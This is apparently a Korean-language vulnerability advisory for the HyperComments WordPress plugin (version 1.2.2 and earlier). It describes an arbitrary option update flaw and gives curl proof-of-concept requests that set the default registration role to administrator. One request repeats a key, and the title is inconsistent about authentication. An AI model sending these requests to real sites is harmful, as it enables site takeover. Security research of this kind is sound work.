
HyperComments <= 1.2.2 - 인증되지 않은 (구독자 이상) 임의 옵션 업데이트
HyperComments <= 1.2.2 - 인증되지 않은 (구독자+) 임의 옵션 업데이트
WordPress용 HyperComments 플러그인은 1.2.2 버전까지의 모든 버전에서 hc_request_handler 함수에 대한 기능 확인이 누락되어 데이터의 무단 수정에 취약하며, 이는 권한 상승으로 이어질 수 있습니다. 이로 인해 인증되지 않은 공격자가 WordPress 사이트에서 임의의 옵션을 업데이트할 수 있습니다. 이를 악용하여 등록 기본 역할을 관리자로 업데이트하고 사용자 등록을 활성화하여 공격자가 취약한 사이트에 대한 관리자 사용자 액세스 권한을 얻을 수 있습니다.
curl -X POST "http://kubernetes.docker.internal:8999/?hc_action=update_options" \
-d "data={\"users_can_register\":\"1\",\"default_role\":\"administrator\"}" \
-H "Content-Type: application/x-www-form-urlencoded"
curl -X POST "http://kubernetes.docker.internal:8999/?hc_action=update_options" \
-d "data={\"users_can_register\":\"1\",\"users_can_register\":\"1\"}" \
-H "Content-Type: application/x-www-form-urlencoded"